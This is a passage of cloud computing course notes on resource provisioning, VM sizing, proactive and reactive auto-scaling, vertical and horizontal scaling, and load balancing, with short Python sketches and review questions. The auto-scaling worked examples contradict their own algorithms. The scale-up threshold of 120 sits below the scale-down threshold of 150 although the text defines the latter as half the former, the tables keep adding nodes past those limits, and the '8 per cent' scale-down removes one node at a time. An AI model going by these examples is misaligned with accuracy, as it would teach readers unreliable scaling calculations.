Fig 3: Problem of Resource Over-provisioning

4.6.2 Dynamic Approach

In dynamic provisioning, as per the requirement, resources can be allocated or de-allocated
during run-time. Customers in this case don’t need to predict resource requirements. Resources
are allocated from the pool when required and removed from the virtual machine and returned
back to the pool of free resources when no more are required. This makes the system elastic.
This approach allows customers to be charged per usage basis.

Dynamic provisioning is suited for applications where demands for resources are un-predictable
or frequently varies during run-time. It is best suited for scalable applications. It can adapt to
changing needs at the cost of overheads associated with run-time allocations. This may lead to a
small amount of delay but solves the problem of over-provisioning and under-provisioning.

4.6.3 Hybrid Approach

Dynamic provisioning although solves the problems associated with static approach but may lead
to overheads at run-time. Hybrid approach solves the problem by combining the capabilities of
static and dynamic provisioning. Static provisioning can be done in the beginning when creating
a virtual machine in order to limit the complexity of provisioning. Dynamic provisioning can be
done later for re-provisioning when the workload changes during run-time. This approach can be
efficient for real-time applications.
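A minimal Python sketch of the hybrid idea, under assumed names and threshold values, might look
as follows: a static baseline is reserved when the VM is created, and a dynamic top-up is applied or
released as the observed utilization changes.

# Hypothetical sketch of the hybrid approach: a static baseline is allocated
# when the VM is created, and extra capacity is added or returned at run time.

STATIC_BASELINE = 4          # cores reserved up front (static provisioning)
MAX_DYNAMIC_EXTRA = 12       # cap on what may be borrowed from the pool

def reprovision(current_cores, utilization):
    # Return the new core count for a VM given its current utilization (0..1).
    if utilization > 0.8 and current_cores < STATIC_BASELINE + MAX_DYNAMIC_EXTRA:
        return current_cores + 2                           # dynamic scale up
    if utilization < 0.3 and current_cores > STATIC_BASELINE:
        return max(STATIC_BASELINE, current_cores - 2)     # give cores back
    return current_cores                                   # workload within expectations

cores = STATIC_BASELINE
for load in (0.5, 0.9, 0.95, 0.6, 0.2):   # simulated utilization samples
    cores = reprovision(cores, load)
    print(load, "->", cores)               # prints 4, 6, 8, 8, 6 for the samples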

4.7 VM SIZING

Virtual machine (VM) sizing is the process of estimating the amount of resources that a VM
should be allocated. Its objective is to make sure that VM capacity is kept proportionate to the
workload. This estimation is based upon various parameters specified by the customer. VM
sizing is done at the beginning in case of static provisioning. In dynamic provisioning, VM size
can be changed depending upon the application workload.

There are two ways to do VM sizing –

1. Individual VM based – In this case, depending upon the previous workload patterns,
resources are allocated VM-by-VM initially. Resources can be later allocated from the pool
when the load goes beyond expectations (a small sizing sketch follows this list).
2. Joint-VM based – In this case, allocation to VMs are done in a combined way. Resources
assigned to a VM initially can be reassigned to another VM hosted on the same physical
machine. Hence it leads to overall efficient utilization.
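For the individual VM based case above, sizing from previous workload patterns can be sketched as
follows in Python. The percentile, headroom factor and sample values are illustrative assumptions,
not prescribed figures.

import math

def size_vm(cpu_samples, percentile=0.9, headroom=1.2):
    # Estimate cores to allocate from a history of per-interval CPU demand:
    # take a high percentile of past usage and add some headroom.
    ordered = sorted(cpu_samples)
    idx = min(len(ordered) - 1, math.ceil(percentile * len(ordered)) - 1)
    return math.ceil(ordered[idx] * headroom)

history = [1.2, 1.5, 2.0, 2.2, 1.8, 2.4, 6.0, 2.1, 1.9, 2.3, 2.0, 1.7]
print(size_vm(history))   # 3 cores; the single 6.0 spike is not sized for

Sizing to a percentile rather than the absolute peak keeps the VM proportionate to the usual
workload; the occasional spike is then handled by dynamic provisioning from the pool.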

Check Your Progress 3

1. What is a Resource Provisioning ?


2. Explain various resource provisioning approaches.
3. Explain the problems of Over-provisioning and Under-provisioning.

4.8 SUMMARY
In this unit an important attribute of Cloud Computing technology called Resource pooling is
discussed. It is a collection of resources available for allocation to users. A large pool of physical
resources - storage, network and server pools are maintained in cloud data centers and presented
to users as virtual services. Resources may be allocated to serve a single user or application, or
can be even shared among multiple users or applications. Resources can be assigned to virtual
machines using static, dynamic and hybrid provisioning approaches.

Answers to Check Your Progress 1

1. Resource pool is a collection of resources available for allocation to users. All types of
resources – compute, network or storage, can be pooled. It creates a layer of abstraction for
consumption and presentation of resources in a consistent manner. A large pool of physical
resources is maintained in cloud data centers and presented to users as virtual services. Any
resource from this pool may be allocated to serve a single user or application, or can be even
shared among multiple users or applications. Also, instead of allocating resources permanently to
users, they are dynamically provisioned on a need basis. This leads to efficient utilization of
resources as load or demand changes over a period of time.

2. A resource pooling architecture is composed of Server, storage and network pools. An


automated system is needed to be established in order to ensure efficient utilization and
synchronization of pools.

a) Server pools - They are composed of multiple physical servers along with operating
system, networking capabilities and other necessary software installed on it.
b) Storage pools – They are composed of file based, block based or object based storage
made up of storage devices like- disk or tapes and available to users in virtualized mode.
c) Network pools - They are composed of different networking devices like- gateways,
switches, routers, etc. Virtual networks are then created from these physical networking

devices and offered to customers. Customers can further build their own networks using
these virtual networks.

3. Storage pools are composed of file based, block based or object based storage.

a) File based storage – it is needed for applications that require file system or shared file
access. It can be used to maintain repositories, development, user home directories, etc.
b) Block based storage – it is a low latency storage needed for applications requiring
frequent access like databases. It uses block level access hence needs to be partitioned
and formatted before use.
c) Object based storage – it is needed for applications that require scalability,
unstructured data and metadata support. It can be used for storing large amounts of data
for analytics, archiving or backups.

Answers to Check Your Progress 2

1. In single tenancy architecture, a single instance of an application software along with its
supporting infrastructure, is used to serve a single customer. Customers have their own
independent instances and databases which are dedicated to them. Since there is no sharing with
this type of tenancy, it provides better security but costs more to the customers.
In multi-tenancy architecture, a single instance of an application software along with its
supporting infrastructure, can be used to serve multiple customers. Customers share a single
instance and database. Customer’s data is isolated from each other and remains invisible to
others. Since users are sharing the resources, it costs less to them as well as is efficient for the
providers.

2. Multi-tenancy can be implemented at all the service levels.

a) Multi-tenancy at IaaS level – It can be done by virtualization of resources and


customers sharing the same set of resources virtually without affecting others. In this
way, customers can share infrastructure resources.

b) Multi-tenancy at PaaS level- It can be done by running multiple applications from


different vendors over the same operating system. This removes the need for separate
virtual machine allocation and leads to customers sharing operating systems.

c) Multi-tenancy at SaaS level- It can be done by sharing a single application instance


along with a database instance. Hence a single application serves multiple customers.

Answers to Check Your Progress 3

1. Resource provisioning is the process of allocating resources to applications or the customers.


When a customer demands resources, they must be provisioned automatically from a shared
pool of configurable resources.

2. There can be three types of resources provisioning approaches– static, dynamic and hybrid.

a) In static resource provisioning, resources are allocated to virtual machines only


once, at the beginning according to user’s or application’s requirement. It is not
expected to change further. It is suitable for applications that have predictable and
static workloads.

b) In dynamic provisioning, as per the requirement, resources can be allocated or de-


allocated during run-time. Customers in this case don’t need to predict resource
requirements. It is suited for applications where demands for resources are un-
predictable or frequently varies during run-time.

c) Hybrid Provisioning combines the capabilities of static and dynamic provisioning.


Static provisioning is done in the beginning when creating virtual machines in
order to limit the complexity of provisioning. Dynamic provisioning is done later
for re-provisioning when the workload changes during run-time. This approach
can be efficient for real-time applications.

3. Under-provisioning is the scenario when actual demand for resources exceeds the available
resources. It may lead to service downtime or application degradation. This problem may be
avoided by reserving sufficient resources in the beginning.

Reserving large amounts of resources may lead to another problem called Over-provisioning. It
is a scenario in which the majority of the resources remain un-utilized. It may lead to
inefficiency to the service provided and incurs unnecessary cost to the consumers.


UNIT 5 SCALING

Structure:-

5.1 Introduction
5.2 Objective
5.3 Scaling primitives
5.4 Scaling Strategies
5.4.1 Proactive Scaling
5.4.2 Reactive Scaling
5.4.3 Combinational Scaling
5.5 Auto Scaling in Cloud
5.6 Types of Scaling
5.6.1 Vertical Scaling or Scaling Up
5.6.2 Horizontal Scaling or Scaling Out

5.1 INTRODUCTION

The scalability in cloud computing refers to the flexibility of allocating IT


resources as per the demand. Various applications running on cloud instances
experience variable traffic loads and hence the need of scaling arises. The need
of such applications can be of different types such as CPU allocation, Memory
expansion, storage and networking requirements etc. To address these different
requirements, virtual machines are one of the best ways to achieve scaling.
Each of the virtual machines is equipped with a minimum set of configurations
for CPU, Memory and storage. As and when required, the machines can be
configured to meet the traffic load. This is achieved by reconfiguring the
virtual machine for better performance for the target load. Sometimes it is quite
difficult to manage such on-demand configurations manually, hence auto
scaling techniques play an important role.

In this unit we will focus on the various methods and algorithms used in the
process of scaling. We will discuss various types of scaling, their usage and a
few examples. We will also discuss the importance of various techniques in
saving cost and man efforts by using the concepts of cloud scaling in highly
dynamic situations. The suitability of scaling techniques in different scenarios
is also discussed in detail.

To understand scaling, it is important to first understand the elastic property of the cloud:
elasticity is the ability of the cloud to provision and de-provision resources as the demand
changes, and scaling is the mechanism through which this elasticity is exercised (see Section 5.3).

5.2 OBJECTIVES

After going through this unit you should be able to:
➔ describe scaling and its advantage;

➔ understand the different scaling techniques;


➔ learn about the scaling up and down approaches;

➔ understand the basics of auto scaling


➔ compare among Proactive and Reactive scaling;

5.3 SCALING PRIMITIVES

The basic purpose of scaling is to enable one to use cloud computing


infrastructure as much as required by the application. Here, the cloud resources
are added or removed according to the current need of the applications. The
property to enhance or to reduce the resources in the cloud is referred to as
cloud elasticity, the process is known as scaling. Scaling exploits the elastic
property of the Cloud. The scalability of cloud architecture is achieved using
virtualization (see Unit 3: Resource Virtualization). Virtualization uses virtual
machines (VM’s) for enhancing (up scaling) and reducing (down scaling)
computing power. The scaling provides opportunities to grow businesses to a
more secure, available and need based computing/ storage facility on the cloud.
Scaling also helps in optimizing the finances involved for highly resource
bound applications for small to medium enterprises.
The key advantages of cloud scaling are: -

1. Minimum cost: The user has to pay a minimum cost for access usage of
hardware after upscaling. The hardware cost for the same scale can be
much greater than the cost paid by the user. Also, the maintenance and
other overheads are also not included here. Further, as and when the
resources are not required, they may be returned to the Service provider
resulting in the cost saving.

2. Ease of use: The cloud upscaling and downscaling can be done in just a
few minutes (sometime dynamically) by using service providers
application interface.

3. Flexibility: The users have the flexibility to enable/ disable certain


VM’s for upscaling and downscaling by them self and thus saving
configuration/ installation time for new hardware if purchased
separately.

4. Recovery: The cloud environment itself reduces the chance of disaster


and amplifies the recovery of information stored in the cloud.


The scalability of the clouds aims to optimize the utilization of various


resources under varying workload conditions such as under provisioning and
over provisioning of resources. In non-cloud environments resource utilization
can be seen as a major concern as one has no control on scaling. Various
methods exist in literature which may be used in traditional environment
scaling. In general, a peak is forecasted and accordingly infrastructure is set up
in advance. This kind of scaling experiences high latency and requires manual
monitoring. The drawback of such a setup is that the estimate of the maximum
load may err at either end, resulting in either an over-provisioned or a poorly
configured system.

In the case of the clouds, virtual environments are utilized for resource
allocation. These virtual machines enable clouds to be elastic in nature which
can be configured according to the workload of the applications in real time. In
such scenarios, downtime is minimized and scaling is easy to achieve.

Figure 1. Manual scaling in traditional environments (cost and workload over time)

Figure 2. Semi-automatic scaling in cloud environments (cost and workload over time)

On the other hand, scaling saves cost of hardware setup for some small time
peaks or dips in load. In general most cloud service providers provide scaling
as a process for free and charge only for the additional resources used. Scaling is
a common service provided by almost all cloud platforms. Note also that the
user saves cost when the usage of resources declines, by scaling down.

5.4 SCALING STRATEGIES

Let us now see what are the strategies for scaling, how one can achieve scaling
in a cloud environment and what are its types. In general, scaling is categorized
based on the decision taken for achieving scaling. The three main strategies for
scaling are discussed below.

5.4.1 Proactive Scaling

Consider a scenario when a huge surge in traffic is expected on one of the


applications in the cloud. In this situation a proactive scaling is used to cater
the load. Proactive scaling can also be pre-scheduled according to the expected
traffic and demand. This requires an understanding of the traffic flow in advance
in order to utilize resources fully; wrong estimates generally lead to poor
resource management. Prior knowledge of the load helps in better provisioning
of the cloud, so that minimum lag is experienced by the end users when the
sudden load arrives. The figure below shows the resources provisioned as the
load increases with time.

Figure: Proactive scaling - resources are provisioned ahead of the expected load (load vs. time of day)

5.4.2 Reactive Scaling

The reactive scaling often monitors and enables smooth workload changes to
work easily with minimum cost. It empowers users to easily scale up or down
computing resources rapidly. In simple words, when hardware resources like the
CPU, RAM or any other resource reach their highest utilization, more resources
are added to the environment by the service provider. The auto
scaling works on the policies defined by the users/ resource managers for
traffic and scaling. One major concern with reactive scaling is a quick change
in load, i.e. user experiences lags when infrastructure is being scaled.

Figure: Reactive scaling - resources are added as the actual load rises (load vs. time of day)

5.4.3 Combinational Scaling

Till now we have seen need based and forecast based scaling techniques. However, for
better performance and a low cool down period we can also combine both the reactive
and proactive scaling strategies where we have some prior knowledge of the traffic. This
helps us in scheduling timely scaling strategies for the expected load. On the other hand,
we also have the provision of load based scaling apart from the predicted load on the
application. This way both the problems of sudden and expected traffic surges are
addressed.

Given below is the comparison between proactive and reactive scaling strategies.

Parameters | Proactive Scaling | Reactive Scaling
Suitability | For applications whose load increases in an expected/ known manner | For applications whose load increases in an unexpected/ unknown manner
Working | User sets the threshold, but a downtime is required | User defined threshold values optimize the resources
Cost Reduction | Medium cost reduction | Medium cost reduction
Implementation | A few steps required | Fixed number of steps required

Check your Progress 1

1) Explain the importance of scaling in cloud computing?


…………………………………………………………………………
…………………………………………………………………………
…………………………………………………………………………

2) How is proactive scaling achieved through virtualization?


…………………………………………………………………………
…………………………………………………………………………
…………………………………………………………………………

3) Write differences between combinational and reactive scaling.

…………………………………………………………………………………………

…………………………………………………………………………………………

…………………………………………………………………………………………

5.5 AUTO SCALING IN CLOUD

One of the potential risks in scaling a cloud infrastructure is its magnitude of


scaling. If we scale it down to a very low level, it will adversely affect the
throughput and latency. In this case, a high latency will be affecting the user’s
experience and can cause dissatisfaction of the users. On the other hand, if we
scale up the cloud infrastructure to a large extent, the resources will not be
optimally utilized and the cost will be heavy, so the whole purpose of cost
optimization fails.

In a cloud, auto scaling can be achieved using user defined policies, various
machine health checks and schedules. Various parameters such as Request
counts, CPU usage and latency are the key parameters for decision making in
autoscaling. A policy here refers to the instruction sets for clouds in case of a
particular scenario (for scaling -up or scaling -down). The autoscaling in the
cloud is done on the basis of following parameters.


1. The number of instances by which to scale.

2. Whether this number is specified as an absolute number or as a percentage of the current capacity.

The process of auto scaling also requires some cooldown period for resuming
the services after a scaling takes place. No two concurrent scaling are triggered
so as to maintain integrity. The cooldown period allows the process of
autoscaling to get reflected in the system in a specified time interval and saves
any integrity issues in cloud environment.
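The cooldown idea can be sketched in a few lines of Python. The names and the 300-second window
below are assumptions for illustration; real platforms let the user configure this period in their
scaling policies.

import time

COOLDOWN_SECONDS = 300
_last_scale_time = 0.0

def try_scale(action):
    # Apply a scaling action unless we are still inside the cooldown window.
    global _last_scale_time
    now = time.time()
    if now - _last_scale_time < COOLDOWN_SECONDS:
        return False                      # ignore: the previous change is still settling
    _last_scale_time = now
    print("scaling:", action)             # placeholder for the real scaling call
    return True

try_scale("add 2 nodes")                  # accepted
try_scale("add 2 nodes")                  # rejected, cooldown still active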

Figure 4. Automatic scaling in cloud environments (cost and workload over time)

Consider a more specific scenario, when the resource requirement is high for
some time duration e.g. in holidays, weekends etc., a Scheduled scaling can
also be performed. Here the time and scale/ magnitude/ threshold of scaling
can be defined earlier to meet the specific requirements based on the previous
knowledge of traffic. The threshold level is also an important parameter in auto
scaling as a low value of threshold results in under utilization of the cloud
resources and a high level of threshold results in higher latency in the cloud.

After adding additional nodes in a scale-up, the incoming requests per second
per node may drop below the scale-down threshold. This can trigger alternating
scale-up and scale-down actions, known as the ping-pong effect. To avoid both
under-scaling and over-scaling issues, load testing is recommended to meet the
service level agreements (SLAs). An SLA is the agreement between the provider
and the consumer that specifies the service levels (for example, response time
and availability) that must be delivered. In addition, the scaling process is
required to satisfy the following properties.

1. The number of incoming requests per second per node > threshold of
scale down, after scale-up.
2. The number of incoming requests per second per node < threshold of
scale up, after scale-down

Here, in both the scenarios one should reduce the chances of ping-pong effect.

Now we know what scaling is and how it affects the applications hosted on the
cloud. Let us now discuss how auto scaling can be performed in fixed amounts
as well as in percentage of the current capacity.

Fixed amount autoscaling


As discussed earlier, the auto scaling can be achieved by determining the
number of instances required to scale by a fixed number. The detailed
algorithm for fixed amount autoscaling threshold is given below. The
algorithm works for both scaling-up and scaling-down and takes inputs U and
D for both respectively.

--------------------------------------------------------------------------------------------
Algorithm : 1
--------------------------------------------------------------------------------------------
Input : SLA specific application
Parameters:
N_min - minimum number of nodes
D - scale down value.
U - scale up value.
T_U - scale up threshold
T_D - scale down threshold

Let T (SLA) return the maximum incoming request per second (RPS) per node
for the specific SLA.

T_U ← 0.90 x T (SLA)

T_D ← 0.50 x T_U

Let N_c and RPS_n represent the current number of nodes and incoming
requests per second per node respectively.

L1: /* scale up (if RPS_n> T_U) */


Repeat:
N_(c_old) ←N_c
N_c ←N_c + U
RPS_n ←RPS_n x N_(c_old) / N_c
Until RPS_n ≤ T_U

L2: /* scale down (if RPS_n< T_D) */

Repeat:
N_(c_old) ←N_c
N_c ← max(N_min, N_c - D)
RPS_n ←RPS_n x N_(c_old) / N_c
Until RPS_n ≥ T_D or N_c = N_min
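
The pseudocode above can be transcribed almost directly into Python. The sketch below assumes,
as discussed, that scaling stops once the requests per second per node fall back within the
thresholds; the threshold values used in the calls are illustrative only.

def scale_fixed(n_c, rps, u, d, t_u, t_d, n_min=1):
    # Return the new node count for current node count n_c and total load rps.
    rps_n = rps / n_c
    if rps_n > t_u:                          # overloaded: add U nodes at a time
        while rps_n > t_u:
            n_c += u
            rps_n = rps / n_c
    elif rps_n < t_d:                        # underloaded: remove D nodes at a time
        while rps_n < t_d and n_c > n_min:
            n_c = max(n_min, n_c - d)
            rps_n = rps / n_c
    return n_c

# With U = D = 2 and purely illustrative thresholds:
print(scale_fixed(4, 2000, u=2, d=2, t_u=450, t_d=225))   # 6 nodes after scale-up
print(scale_fixed(19, 1900, u=2, d=2, t_u=450, t_d=225))  # 7 nodes after scale-down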

Now, let us discuss how this algorithm works in detail. Let the values of a few
parameters be given as U = 2, D = 2, T_U = 120 and T_D = 150. Suppose in


the beginning, RPS = 450 and N_c = 4. Now RPS is increased to 1800 and
RPS_n almost reaches T_U; in this situation an autoscaling request is
generated, leading to adding U = 2 nodes. Table 1 lists all the parameters as
per the scale-up requirements.

Table 1: Scale-up with U = 2

Nodes (Current) | Nodes (added) | RPS  | RPS_n | Total nodes (required) | New RPS_n
4  | 0 | 450  | 112.5 | 4  | -
4  | 2 | 1800 | -     | 6  | 300
6  | 2 | 2510 | -     | 8  | 313.75
8  | 2 | 3300 | -     | 10 | 330.00
10 | 2 | 4120 | -     | 12 | 343.33
12 | 2 | 5000 | -     | 14 | 357.14

Similarly, in the case of scaling down, let initially RPS = 8000 and N_c = 19. Now
RPS is reduced to 6200, following which RPS_n reaches T_D; here an
autoscaling request is initiated, deleting D = 2 nodes. Table 2 lists all the
parameters as per the scale-down requirements.

Table 2: Scale-down with D = 2

Nodes (Current) | Nodes (reduced) | RPS  | RPS_n  | Total nodes | New RPS_n
19 | 0 | 8000 | 421.05 | 19 | -
19 | 2 | 6200 | -      | 17 | 364.7
17 | 2 | 4850 | -      | 15 | 323.33
15 | 2 | 3500 | -      | 13 | 269.23
13 | 2 | 2650 | -      | 11 | 240.90
11 | 2 | 1900 | -      | 9  | 211.11

The given tables show the stepwise increase/ decrease in the cloud capacity
with respect to the change in load on the application (requests per node per second).

Percentage Scaling:

In the previous section we discussed how scaling up or down is carried out by


a fixed number of nodes. Now consider the situation where we scale up or down
by a percentage of the current capacity, i.e. the number of nodes added or
removed is computed as a percentage of the nodes currently running. This
seems a more natural way of scaling up or down as we are already running at
some capacity.

The below given algorithm is used to determine the scale up and down
thresholds for respective autoscaling.

-----------------------------------------------------------------------------------------------
Algorithm : 2
-----------------------------------------------------------------------------------------------
Input : SLA specific application
Parameters:
N_min - minimum number of nodes
D - scale down value.
U - scale up value.
T_U - scale up threshold
T_D - scale down threshold

Let T (SLA) returns the maximum requests per second (RPS) per node for
specific SLA.

T_U ← 0.90 x T (SLA)


T_D ← 0.50 x T_U

Let N_c and RPS_n represent the current number of nodes and incoming
requests per second per node respectively.

L1: /* scale up (if RPS_n> T_U) */


Repeat:
N_(c_old) ←N_c

N_c ←N_c + max(1, N_c x U/100)

RPS_n ←RPS_n x N_(c_old) / N_c


Until RPS_n ≤ T_U

L2: /* scale down (if RPS_n< T_D) */

Repeat:
N_(c_old) ←N_c
N_c ← max(N_min, N_c - max(1, N_c x D/ 100))
RPS_n ←RPS_n x N_(c_old) / N_c
Until RPS_n ≥ T_D or N_c = N_min
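
Only the step-size computation changes from the fixed amount version. A brief Python sketch of
the percentage-based step is given below, using integer division as an assumed rounding rule and
the thresholds T_U = 290 and T_D = 230 taken from the worked example that follows.

def scale_percent(n_c, rps, u_pct, d_pct, t_u, t_d, n_min=1):
    rps_n = rps / n_c
    while rps_n > t_u:                       # scale up by a percentage of capacity
        n_c += max(1, n_c * u_pct // 100)    # assumed rounding: floor, at least 1 node
        rps_n = rps / n_c
    while rps_n < t_d and n_c > n_min:       # scale down by a percentage of capacity
        n_c = max(n_min, n_c - max(1, n_c * d_pct // 100))
        rps_n = rps / n_c
    return n_c

# With U = 1 (per cent) and D = 8 (per cent), as in the worked example below:
print(scale_percent(6, 2190, u_pct=1, d_pct=8, t_u=290, t_d=230))   # 8 nodes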

Let us now understand the working of this algorithm by an example. Let


N_min = 1, at the beginning RPS = 500 and N_c = 6. Now the demand rises
and RPS reaches 1540 while RPS_n reaches T_U. Here an upscaling is
requested, adding max(1, N_c x U/100) = 1 node.

Similarly, in the case of scaling down, initially RPS = 5000 and N_c = 19; here RPS
reduces to 4140 and RPS_n reaches T_D, requesting a scale down and hence
deleting nodes as per max(1, N_c x D/100). The detailed example is explained using
Table 3, giving details of upscaling with D = 8, U = 1, N_min = 1, T_D = 230
and T_U = 290.

Table 3: Percentage-based scale-up with U = 1 (per cent)

Nodes (Current) | Nodes (added) | RPS  | RPS_n | Total nodes (required) | New RPS_n
6  | 0 | 500  | 83.33 | 6  | -
6  | 1 | 1695 | -     | 7  | 242.14
7  | 1 | 2190 | -     | 8  | 273.75
8  | 1 | 2600 | -     | 9  | 288.88
9  | 1 | 3430 | -     | 10 | 343.00
10 | 1 | 3940 | -     | 11 | 358.18
11 | 1 | 4420 | -     | 12 | 368.33
12 | 1 | 4960 | -     | 13 | 381.53
13 | 1 | 5500 | -     | 14 | 392.85
14 | 1 | 5950 | -     | 15 | 396.6

The scaling down with the same algorithm is detailed in the table below.

Table 4: Percentage-based scale-down with D = 8 (per cent)

Nodes (Current) | Nodes (reduced) | RPS  | RPS_n  | Total nodes | New RPS_n
19 | 0 | 5000 | 263.15 | 19 | -
19 | 1 | 3920 | -      | 18 | 217.77
18 | 1 | 3510 | -      | 17 | 206.47
17 | 1 | 3200 | -      | 16 | 200
16 | 1 | 2850 | -      | 15 | 190
15 | 1 | 2600 | -      | 14 | 185.71
14 | 1 | 2360 | -      | 13 | 181.53
13 | 1 | 2060 | -      | 12 | 171.66
12 | 1 | 1810 | -      | 11 | 164.5
11 | 1 | 1500 | -      | 10 | 150

Here, if we compare both the algorithms 1 and 2, it is clear that the values of the
thresholds are on the higher side in the case of algorithm 2. In this scenario the
utilization of hardware is more and the cloud has a smaller resource footprint.

Check your Progress 2


1) Explain the concept of fixed amount auto scaling.
…………………………………………………………………………
…………………………………………………………………………
…………………………………………………………………………

2) In Algorithm 1 for fixed amount auto scaling, calculate the values in table
if U = 3.
…………………………………………………………………………
…………………………………………………………………………
…………………………………………………………………………

3) What is a cool down period?

…………………………………………………………………………………………

…………………………………………………………………………………………

…………………………………………………………………………………………

5.6 TYPES OF SCALING

Let us now discuss the types of scaling, i.e. how the cloud infrastructure is
viewed when its capacity is enhanced or reduced. In general, we scale the cloud
in a vertical or horizontal way, by either adding capacity to the existing
resources or by installing additional resources.

5.6.1 Vertical scaling or scaling up

The vertical scaling in the cloud refers to either scaling up i.e. enhancing the
computing resources or scaling down i.e. reducing/ cutting down computing
resources for an application. In vertical scaling, the actual number of VMs are
constant but the quantity of the resource allocated to each of them is increased/
decreased. Here no infrastructure is added and application code is also not
changed. The vertical scaling is limited to the capacity of the physical machine
or server running in the cloud. If one has to upgrade the hardware requirements
of an existing cloud environment, this can be achieved by minimum changes.

Figure: Vertical scaling - an IT resource (a virtual server with two CPUs) is scaled up by replacing it with a more powerful IT resource (a server with four CPUs).

5.6.2 Horizontal scaling or scaling out

In horizontal scaling, to meet the user requirements for high availability,


excess resources are added to the cloud environment. Here, the resources are
added/ removed as VMs. This includes addition of storage disks, new server
for increasing CPUs or installation of additional RAMs and work like a single
system. To achieve horizontal scaling, a minimum downtime is required. This
type of scaling allows one to run distributed applications in a more efficient
manner.

Figure: Horizontal scaling - an IT resource (Virtual Server A) is scaled out by adding more of the same IT resources (Virtual Servers B and C) drawn from a pool of physical servers.

Another way of maximizing resource utilization is Diagonal Scaling. This
combines the ideas of both vertical and horizontal scaling. Here, a resource is
scaled up vertically until it hits the physical resource capacity, after which
new resources are added as in horizontal scaling. The newly added resources
can in turn be scaled vertically as well. A small sketch contrasting these
approaches follows.
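
The Python sketch below uses a hypothetical data model to contrast the three approaches: vertical
scaling changes the size of one instance, horizontal scaling changes the number of instances, and
diagonal scaling grows vertically first and then horizontally. The names and limits are assumptions.

MAX_CPUS_PER_SERVER = 8

def scale_vertically(instance, extra_cpus):
    # Grow one instance, bounded by the capacity of the physical machine.
    instance["cpus"] = min(MAX_CPUS_PER_SERVER, instance["cpus"] + extra_cpus)
    return instance

def scale_horizontally(fleet, extra_instances):
    # Add more instances of the same size to the fleet.
    fleet.extend({"cpus": fleet[0]["cpus"]} for _ in range(extra_instances))
    return fleet

def scale_diagonally(fleet, extra_cpus):
    # Grow vertically while possible, then start growing horizontally.
    head = fleet[0]
    if head["cpus"] < MAX_CPUS_PER_SERVER:
        return [scale_vertically(head, extra_cpus)] + fleet[1:]
    return scale_horizontally(fleet, 1)

print(scale_vertically({"cpus": 2}, 2))        # {'cpus': 4}
print(scale_horizontally([{"cpus": 2}], 2))    # three 2-CPU instances
print(scale_diagonally([{"cpus": 8}], 2))      # already at the limit: adds an instance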

SUMMARY

In the end, we are now aware of various types of scaling, scaling strategies and
their use in real situations. Various cloud service providers like Amazon AWS,
Microsoft Azure and IT giants like Google offer scaling services on their
application based on the application requirements. These services offer good
help to the entrepreneurs who run small to medium businesses and seek IT
infrastructure support. We have also discussed various advantages of
cloud scaling for business applications.

SOLUTION/ANSWERS

Answers to CYPs 1.

1. Explain the importance of scaling in cloud computing: Clouds are being used
extensively in serving applications and in other scenarios where the cost and
installation time of scaling infrastructure/ capacity would otherwise be high. Scaling helps in
achieving an optimized infrastructure for the current and expected load of the
applications with minimum cost and setup time. Scaling also helps in reducing the
recovery time if a disaster happens. (for details see section 5.3)

2. How is proactive scaling achieved through virtualization: Proactive scaling is
a process of forecasting and then managing the load on the cloud infrastructure in
advance. Precise forecasting of the requirement is the key to success here. The
preparedness for the estimated traffic/ requirements is achieved using virtualization. With
virtualization, various resources may be assigned to the required machine in no time
and the machine can be scaled up to its hardware limits. Virtualization thus helps in
achieving a low cool down period and in serving requests instantly. (for details you may
refer to Unit 3: Resource Virtualization.)

3) Write differences between combinational and reactive scaling: The reactive scaling
technique only works on the actual variation of load on the application; the
combinational technique, however, works for both the expected and the actual traffic. A
good estimate of the load increases the performance of combinational scaling.

Answers to CYPs 2.

1) Explain the concept of fixed amount auto scaling: The fixed amount scaling is a
simplistic approach for scaling in cloud environment. Here the resources are scaled
up/ down by a user defined number of nodes. In fixed amount scaling resource
utilization is not optimized. It can also happen that adding only a small number of nodes
would solve the resource crunch problem, but the user defined numbers are very high,
leading to underutilized resources. Therefore a percentage amount of scaling is a better
technique for optimal resource usage.

2) In Algorithm 1 for fixed amount auto scaling, calculate the values in table if U = 3:
For the given U = 3, the following calculations are made.

Nodes (Current) | Nodes (added) | RPS  | RPS_n | Total nodes (required) | New RPS_n
4  | 0 | 450  | 112.5 | 4  | -
4  | 3 | 1800 | -     | 7  | 257.14
7  | 3 | 2510 | -     | 10 | 251
10 | 3 | 3300 | -     | 13 | 253.84
13 | 3 | 4120 | -     | 16 | 257.50
16 | 3 | 5000 | -     | 19 | 263.15

3) What is a cool down period: When auto scaling takes place in the cloud, a small time
interval (pause) prevents the triggering of the next auto scaling event. This helps in
maintaining integrity in the cloud environment for applications. Once the cool
down period is over, the next auto scaling event can be accepted.

UNIT 6 LOAD BALANCING

Introduction to Load Balancing:


What is Load Balancing:
It is a practice in parallel computing that distributes jobs over several computers (or other
resources) in order to make the whole process easier and more efficient. Making sure that no
single server carries too much demand and equally dividing the load increases user
responsiveness and website availability.
It is possible to achieve a balanced workload by utilising load balancing to distribute the
work among several devices or hardware components. Devices are often distributed among a
number of servers or across the CPU and hard drives of a single cloud server, depending on
the configuration.
Several factors led to the introduction of load balancing. By limiting the load placed on each
device, you can either make each device respond faster or keep it from reaching its performance limits.
In cloud computing, load balancing is the process of distributing the workload and computer
resources. By spreading resources over several computers, networks, or servers, it allows
businesses to better manage workloads and application needs. Traffic and demand on the
Internet may be managed by cloud load balancing.
The amount of traffic on the Internet is increasing at an accelerating rate, growing by
nearly 100 percent each year. As a result, server workloads are growing fast,
resulting in server overload, particularly for prominent web servers.
server overload may be accomplished in two ways. For starters, you can use a single server
that's been updated to a higher-capacity model. However, the new server may quickly
become overwhelmed, necessitating a fresh update. Furthermore, the upgrade procedure is
time-consuming and costly.
In a second approach, a cluster of servers is used to create a scalable service system. As a
result, setting up a server cluster system to provide network services is more cost-effective
and more scalable.
Cloud-based servers can achieve more precise scalability and availability by using farm
server load balancing. There are several benefits to load balancing, including the ability to
distribute traffic over multiple servers.
In addition, it promotes sturdiness by creating redundant systems. The balancing service is
provided by a specific hardware device or software application.
There are no modern programmes or websites that can function without balancing the
demands placed on them. This is due to the fact that these programmes and websites handle
millions of simultaneous requests from end-users and provide the right text and graphics or
relevant data requested, responsively, and reliably. So far, increasing the number of servers
was considered excellent practice for dealing with such large traffic levels.
With a specialized Load Balancer, on the other hand, you can keep your website or
application running at top efficiency while still providing an excellent user experience.
History of Load Balancing:
In 1990, dedicated hardware was used to spread traffic over a network as part of the load
balancing idea. Even at peak periods when demand is high, load balancing has become more
safe thanks to the introduction of Application Delivery Controllers (ADCs).
